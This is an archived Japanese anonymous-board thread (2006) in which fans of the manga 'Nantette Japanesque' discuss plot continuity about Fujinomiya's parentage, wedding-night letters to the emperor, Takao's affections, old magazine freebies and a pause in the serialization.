全体的に絵柄が可愛い系になってるよね。
もう聡子姫みたいな臈長けた大人の女性って描けないのかな。

138 :花と名無しさん:2006/11/11(土) 03:16:13 ID:???0
藤宮様って、人妻編4巻で「先々帝を父に、内親王を母に」って言ってるけど
人妻編じゃないほうでは母は典侍って言ってなかったっけ
生母の身分が低くて降嫁されて〜ってくだりがあったような。

139 :花と名無しさん:2006/11/11(土) 03:22:52 ID:???0
気になったんで単行本ひっぱりだしてみた。

文庫版1巻、小萩のセリフ
「藤宮さまといえば 前の帝の第八皇女
 御生母さまが 身分低い典侍であったため
 皇族の中にいては 何かと辛い思いを なさるだろうといことで
 (略)」

人妻編4巻、藤宮様のセリフ
「わたくしは 前々帝を父に 内親王を母に持つ身ですの
 (略)」

140 :花と名無しさん:2006/11/11(土) 03:26:44 ID:???O
藤宮さまは二人いるんだよ!!
スティッキー・フィンガーッッッッ!

141 :花と名無しさん:2006/11/11(土) 10:35:06 ID:???0
原作のほうで、



「母親は皇女なのにその母親が典侍と身分が低く、
 藤宮も『元をたどれば典侍腹』と陰口を叩かれた」
とか、
「藤宮の母親には諸説あった」
みたいなフォローがしてあった。

前々帝にはたくさん子どもがいすぎて、遠野宮なんか
存在すら知られてなかったぐらいだから、
藤宮の、早世した母親について、瑠璃とか、ましてや小萩が
正確な情報を持ってなくても不思議は無いのかも。

142 :花と名無しさん:2006/11/11(土) 13:39:19 ID:???0
>>141
原作でそれ読んだ時、
氷室サン、設定変えたんだなと思ったよ。


143 :花と名無しさん:2006/11/12(日) 19:21:38 ID:???0
瑠璃と高彬の初夜のときも疑問だったんだけど、
貴族の姫から簡単に帝に文を届けられるものなの?

144 :花と名無しさん:2006/11/13(月) 01:26:50 ID:???0
そりゃ偉い人にはこっそり何でも届けてくれる優秀な部下がいるから問題なし

145 :花と名無しさん:2006/11/15(水) 01:44:16 ID:???0
転勤

146 :花と名無しさん:2006/11/15(水) 21:51:53 ID:???O
ていうか当時は、いつ結婚式挙げるかなんて公にせず、
男が女の許にこっそり通って三日目くらいに、二人で餅食べてお披露目みたいな儀をするんじゃなかった?
瑠璃の場合は家中の人間が承知の上の初夜だったけど、
帝があんなにも早く情報キャッチして文送るなんて、
ずいぶん優秀な密偵がいるんだねw

147 :花と名無しさん:2006/11/15(水) 22:16:07 ID:???0
>>146
藤宮さまが報告したんじゃなかったっけ?
昼間、藤宮さまが来て…って感じだったような…

148 :花と名無しさん:2006/11/15(水) 22:22:12 ID:???0
>>146
帝には瑠璃から文を送ったんでしょ?
「今日から人妻になります。よろしくね」
もしくは「人妻になっちゃっても気にしないでね」ってやつ。


149 :花と名無しさん:2006/11/15(水) 23:44:34 ID:???0
鷹男(東宮時代)が文を送っておじゃんになった初夜
→藤宮さまが知らせた(その前に瑠璃が藤宮さまに報告してる)
これが>>147さんの言ってるやつ。

瑠璃と高彬がちゃんと結婚できた初夜
→瑠璃が事前に文を送って報告した。
これが>>148さんの言ってるやつ。

150 :花と名無しさん:2006/11/16(木) 01:15:23 ID:???0
でもちゃんと結婚できた初夜にも、鷹男から文来なかった?
小萩があわあわしながら瑠璃に報告してた気が。
「人妻ゆえに... 」で始まるの。

151 :花と名無しさん:2006/11/16(木) 01:23:30 ID:5ojL7Wax0
>>150
前のレス100回読み直せ

152 :146:2006/11/16(木) 05:54:27 ID:???O
>>147->>149
ありがとうございました。そういえばそうでしたね〜
すっかり失念しててハズカシイ…

153 :花と名無しさん:2006/11/19(日) 03:14:30 ID:???0
鷹男が1番愛してるのって誰なんでしょうね?
やっぱり承香殿なのかな?

154 :花と名無しさん:2006/11/19(日) 04:26:36 ID:???0
ガチで高彬

155 :花と名無しさん:2006/11/19(日) 11:07:53 ID:???0
どうだろうね。
帝という身分上、特定個人に思い入れを持ってはいけない
との自戒もあるだろうし。
藤宮を大事にして、瑠璃を気に入って、高彬を信頼して
承香殿と子まで成してるけど、誰が一番っていうと思いつかない。

超個人的に、文句なしの美人で宮筋の身分で瑠璃をも圧倒させる
性格の煌姫が、瑠璃の後見で入内したら面白そうだとは思ってる。

156 :花と名無しさん:2006/11/19(日) 11:15:29 ID:???0
私も誰が一番、ってなると思い浮かばないな。

でもそういうところが妙に好きだ、鷹男。

157 :花と名無しさん:2006/11/20(月) 05:15:15 ID:???0
というか鷹男は実際何人妻いるんだろ。
名前が出たのは承香殿と桐壺、みくしげ殿だけだったよね?

158 :花と名無しさん :2006/11/21(火) 20:09:12 ID:GcBvTuow0
部屋を片付けていたら、
花ゆめに連載していたジャパネスクキャラのハンカチ(未使用)が出てきた。
今から15年位前のもの。

オクに売るかもしれん。いくらなら売れると思う??



159 :花と名無しさん:2006/11/22(水) 02:55:34 ID:???O
さあ?
別に買わないし。
作品が好きなわけで、ハンカチが好きなんじゃない。

160 :花と名無しさん:2006/11/22(水) 16:18:07 ID:???0
>159 まぁそうつっかかんなさんな

15年前のだと欲しい人いるかもね。自分でテキトウに出したら欲しい人いればつりあがるんじゃ

161 :花と名無しさん:2006/11/22(水) 17:09:37 ID:???0
ていうかファンスレでオク売り話って煽りと取られても仕方ないと思う

162 :花と名無しさん:2006/11/22(水) 18:01:04 ID:???O
>>158
抽選プレゼントじゃなく付録なら、プレミア感が少ないので
50〜100円スタートじゃないか?
自分は山内さん好きだけど、世間的相場が低い作家さんなのは否定出来ない。
あと漫画好きでも、おまけの類を集める人は、また別種の趣味だとも思うし…

クリアファイルやブックカバー、紙袋等大きなサイズのカラー絵なら
ちょっと欲しいけど…ハンカチはどっちでもいいや。

163 :花と名無しさん:2006/11/22(水) 23:11:29 ID:???0
>>162
> クリアファイルやブックカバー、紙袋等大きなサイズのカラー絵

あぁ… 5年ぐらい前にほぼ全部処分したよ。
クリアファイルもブックカバーも紙袋もあったのに。
花ゆめの付録はもちろん、アニメイトで売ってたグッズも全部持ってた。
158のハンカチも持ってた。
全プレのテレカなら、もしかしたら今まだあるかも知れないなぁ。


164 :花と名無しさん:2006/11/24(金) 22:36:53 ID:???0
今月号、完全に昔のテンポに戻ってましたね。
コマ割とか、ページの見せ方、抜き方。
すごく読み易かったです。


165 :花と名無しさん:2006/11/29(水) 03:59:04 ID:???0
今月号の表紙、別花スレでも好評で嬉しい。

166 :花と名無しさん:2006/11/29(水) 21:17:15 ID:???O
今気付いたけど別冊「花とゆめ」次号とその次の3号と2ヵ月『なんジャパ』休みなんだ〜!! お〜い本屋に購読申し込みしてる者にとってはきついぞ〜(T_T)

167 :花と名無しさん:2006/11/30(木) 05:07:54 ID:???0
定期購読ってやった事無いからやれるのか知らないんだけど
事前に「次号とその次の号だけいらないです」言ったら
対処してもらえないんだろうか。

168 :166:2006/12/01(金) 06:12:19 ID:???O
>>167
レスありがとうm(__)m 本屋に行ってきいてみます。
 早く続きみたいですねぇ。

169 :花と名無しさん:2006/12/14(木) 19:47:35 ID:???0
保守(´∀`)

170 :花と名無しさん:2006/12/22(金) 13:49:57 ID:???O
>>166を見ながら…
来週楽しみだね〜と脳天気にレスしようとしていた、アフォな自分に気付いた。
連載止まるとネタ思いつかんな〜。
原作読み返して待つか…。

171 :花と名無しさん:2006/12/28(木) 23:14:44 ID:???0
もうしわけないけど氷室冴子のコバンザメって印象の漫画家

172 :花と名無しさん:2006/12/29(金) 22:03:43 ID:???0
age

173 :花と名無しさん:2006/12/29(金) 22:48:44 ID:???O
読者がどんな印象もとうと別に悪くないんじゃね?
私は、氷室作品を少女漫画にするのには最高の漫画家だと思う。
この憎めないキャラ、綺麗な絵。ぴったりすぎる。

40 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)